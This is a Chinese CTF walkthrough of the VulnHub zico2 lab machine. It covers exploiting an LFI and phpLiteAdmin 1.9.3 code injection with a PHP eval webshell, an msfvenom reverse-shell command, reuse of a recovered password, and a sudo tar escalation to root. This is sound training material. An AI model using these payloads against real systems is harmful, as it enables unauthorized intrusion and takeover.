VulnHub-zico2: 1-靶机渗透学习 – 作者:DXR嗯嗯呐

靶机地址:https://www.vulnhub.com/entry/zico2-1,210/

靶机难度:中级(CTF)

靶机描述:

Zico试图建立自己的网站,但在选择要使用的CMS时遇到了一些麻烦。在尝试了一些受欢迎的方法后,他决定建立自己的方法。那是个好主意吗?

提示:枚举,枚举和枚举!

目标:得到root权限&找到flag.txt

作者:DXR嗯嗯呐

信息收集

nmap扫描靶机IP

1611075922_60071152a42d9eee5adf5.png!small?1611075923172

nmap端口扫描

nmap -sS -A -p- -T 4 192.168.16.148

1611075934_6007115ebddc405edc42b.png!small?1611075934926

22 ssh

80 http

111 rpcbind

59667 RPC

访问80端口

1611075944_60071168bf39e66b11905.png!small?1611075949537

测试发现此处存在一个LFI漏洞

1611075954_6007117282a998d46d7fe.png!small?1611075954364

1611075959_600711774c4c6e1cd9575.png!small?1611075960340

dirb爆破目录

1611107840_60078e00de8f53018125f.png!small?1611107839817

看到了一个目录比较敏感,访问目录看看

1611075973_600711853eeecd5411ee3.png!small?1611075972929

发现一个文件看一下,先测试一下目录是否存在put协议

1611075979_6007118b8dfd665c05696.png!small?1611075979270

phpLiteAdmin <= 1.9.3 远程PHP代码执行

访问文件看看

phpLiteAdmin是一个用PHP写的基于web的SQLite数据库管理工具

1611075986_60071192943506b6c7135.png!small?1611075986270

密码使用admin登陆成功

1611075992_60071198efa7774cda0d9.png!small?1611075993884

百度查了一下发现phpLiteAdmin V1.9.3存在php远程代码执行漏洞。我们看看怎么利用

https://www.exploit-db.com/exploits/24044

这个漏洞利用需要登录phpLiteAdmin,还需要有创建数据库权限。我们都具备,看是测试

首先登陆SqliteAdmin创建数据库test.php

若在sqliteadmin没有test.php,则此时会在当前目录下生成test.php

1611076013_600711adde8009e2303c3.png!small?1611076014434

在数据库中插入表

CREATE TABLE ‘test1′(‘s’);

1611076028_600711bc5aa377eec0936.png!small?1611076028298

将一句话木马插入表中

‘<?php @eval($_POST[cmd]);?>’

1611076147_6007123323b596f21d4fc.png!small?1611076147218

利用LFI漏洞,根据图中php的绝对路径访问文件

1611076163_600712438b573fdfb3352.png!small?1611076163190

1611076171_6007124ba23d2a3761f61.png!small?1611076171445

使用菜刀连接一下,获得权限

1611076198_60071266a67189cc2a5c2.png!small?1611076198238

直接使用kail生成一个反弹shell的php文件,上传到靶机

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.16.143 LPORT=4444 -f raw > shell.php

1611076206_6007126e7ee6cb65359c0.png!small?1611076206199

将shell上传到靶机。

1611076218_6007127aee3c094524ad3.png!small?1611076218551

使用msfconsole连接反弹shell

1611076229_60071285c44ec2a1daf8f.png!small?1611076229513

提权

在home下发现zico目录可以访问,发现有个wordpress目录看一下他的wp-config.php 文件,发现和ssh用户名一致的数据库用户名

1611076238_6007128e8b08d668e7999.png!small?1611076238157

使用密码登陆一下ssh,发现可以登陆。

1611076266_600712aa33cd75f773874.png!small?1611076265744

zico/sWfCsfJSPV9H3AmQzw8

发现用户具备sudo权限

1611076281_600712b933af70eccbe06.png!small?1611076280776

使用tar提权,获得root权限,获得flag文件

sudo tar -cf /dev/null /dev/null –checkpoint=1 –checkpoint-action=exec=/bin/sh

1611076289_600712c188b5f9e2394d9.png!small?1611076289226

完成!!!

总结

这次的靶机比较简单,两个较为关键的登陆密码都没有费多大功夫。进行干!

1、使用nmap进行端口扫描,访问80端口,测试网页发现存在LFI漏洞。

2、dirb扫描发现dbadmin目录,访问发现phpLiteAdmin登陆界面,使用admin登陆,根据版本号发现存在远程PHP代码执行漏洞,利用该漏洞获得www用户shelll。

3、在zico目录存在找到zico登陆密码,登陆发现zico用户具备sudo权限,使用tar命令提权,获得root权限。

来源:freebuf.com 2021-01-20 09:59:17 by: DXR嗯嗯呐

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论